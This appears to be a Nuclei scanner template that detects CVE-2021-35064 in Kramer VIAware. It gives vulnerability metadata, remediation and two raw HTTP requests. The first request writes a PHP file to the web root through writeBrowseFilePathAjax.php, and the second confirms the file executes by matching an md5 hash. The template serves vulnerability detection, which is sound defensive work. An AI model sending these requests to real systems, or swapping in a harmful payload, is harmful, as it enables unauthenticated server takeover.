id: CVE-2021-35064

info:
  name: Kramer VIAware - Privilege Escalation and Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    Kramer VIAware, all tested versions, allow privilege escalation and remote code execution due to misconfigured sudo permissions. Attackers can execute arbitrary system commands remotely if the web interface is accessible, due to vulnerabilities in the handling of privileged operations through ajaxPages/writeBrowseFilePathAjax.php and improper sudoers configurations.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP code via file upload, leading to complete server compromise and control over the Kramer VIAware system.
  remediation: |
    Apply the latest firmware update provided by Kramer to fix misconfigured sudoers permissions and ensure proper validation in the web interface.
  reference:
    - http://packetstormsecurity.com/files/166623/Kramer-VIAware-Remote-Code-Execution.html
    - https://www.kramerav.com/us/product/viaware
    - https://www.exploit-db.com/exploits/50856
    - https://write-up.github.io/kramerav/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35064
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-35064
    cwe-id: CWE-269
    epss-score: 0.89527
    epss-percentile: 0.9957
    cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: kramerav
    product: viaware
    fofa-query: icon_hash="1521468900"
  tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav,vkev,vuln

variables:
  useragent: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        radioBtnVal=%3C%3Fphp+echo+md5%28%22CVE-2021-35064%22%29%3B+%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php

      - |
        GET /{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - "44f63b292601ec4ab0d8c3244c9f5ebe"
# digest: 490a0046304402207069accfddc542f4b15d803c77cad0df3148c3744828a2d123dbf86ee0fa3e3c02203a2d619e02ea278facc3583b2b9f7859fe6635cd9ac50843041799fba2770499:922c64590222798bb761d5b6d8e72950